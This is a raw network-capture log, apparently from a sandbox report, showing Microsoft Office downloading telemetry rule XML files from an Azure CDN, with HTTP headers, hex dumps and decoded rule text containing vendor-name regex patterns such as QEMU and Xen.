                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:50 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                        x-ms-request-id: c700c3f3-301e-0000-760a-3deecc000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041150Z-178bfbc474bwlrhlhC1NYCy3kg00000005h00000000023n2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:51 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        72192.168.2.74977913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:50 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                        x-ms-request-id: 671fd92a-701e-0097-24e1-3db8c1000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041151Z-178bfbc474bxkclvhC1NYC69g400000005fg000000000xvd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        73192.168.2.74978013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:50 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                        x-ms-request-id: 606a4207-501e-005b-157e-3bd7f7000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041151Z-174c587ffdfp4vpjhC1TEBybqw00000003z00000000052u6
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:51 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        74192.168.2.74978213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:50 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                        x-ms-request-id: 93d7ba64-801e-002a-7fce-3b31dc000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041151Z-15b8b599d88l2dpthC1TEBmzr000000003y00000000048u2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:51 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        75192.168.2.74978413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:52 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                        x-ms-request-id: e2b7c591-f01e-003f-257e-3bd19d000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041153Z-174c587ffdfb5q56hC1TEB04kg00000003tg00000000ebfx
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:53 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        76192.168.2.74978313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:52 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                        x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041153Z-178bfbc474bmqmgjhC1NYCy16c00000005n0000000000st3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        77192.168.2.74978513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:52 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                        x-ms-request-id: 5c8e7bca-d01e-0049-4f4b-3ce7dc000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041153Z-15b8b599d886w4hzhC1TEBb4ug00000003wg00000000gsgf
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:53 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        78192.168.2.74978613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:53 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                        x-ms-request-id: f5c58262-401e-00ac-04df-3d0a97000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041153Z-178bfbc474brk967hC1NYCfu60000000056000000000dqxb
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:53 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        79192.168.2.74978713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:53 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                        x-ms-request-id: 9a395038-201e-0071-807e-3bff15000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041153Z-174c587ffdftjz9shC1TEBsh9800000003p000000000rat0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        80192.168.2.74979513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:55 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                        x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041155Z-15b8b599d88phfhnhC1TEBr51n000000040g00000000byv2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:56 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        81192.168.2.74979713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:55 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
